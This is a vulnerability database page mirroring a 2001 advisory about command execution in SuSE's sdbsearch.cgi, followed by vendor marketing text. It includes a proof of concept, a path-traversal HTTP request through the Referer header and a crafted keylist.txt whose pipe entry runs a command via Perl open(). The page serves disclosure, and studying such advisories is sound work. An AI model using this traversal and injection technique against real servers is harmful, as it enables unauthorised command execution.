Vulners
Lucene search
SuSE 6.3/6.4/7.0 sdb - Arbitrary Command Execution
source: https://www.securityfocus.com/bid/3208/info
An input validation error exists in sdb, the SuSE Support Data Base.
The problem exists in the sdbsearch.cgi script, which uses data directly from the 'Referer' header field from a HTTP request as a path when opening it's "keylist.txt" file. The keylist file contains a list of keywords and associated files, which are opened using Perl's open() command.
If an attacker is able to create a malicious "keylist.txt" file on a vulnerable host, it may be possible for the attacker to cause arbitrary commands to be executed by the sdbsearch.cgi script.
Proof of concept is very simple, just create harmful keylist.txt for instance in /tmp directory and send request to http server like this:
GET /cgi-bin/sdbsearch.cgi?stichwort=keyword HTTP/1.0
Referer: http://szachy.org/../../../../../tmp
(very deep traversal because we don't know what is DOCUMENT_ROOT)
and an example content of our /tmp/keylist.txt create like this:
$ echo -e "keyword\0touch exploitable|" > /tmp/keylist.txt
After successful attempt there will be "exploitable" file in /tmp directory. Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 Aug 2001 00:00Current
7.4High risk
Vulners AI Score7.4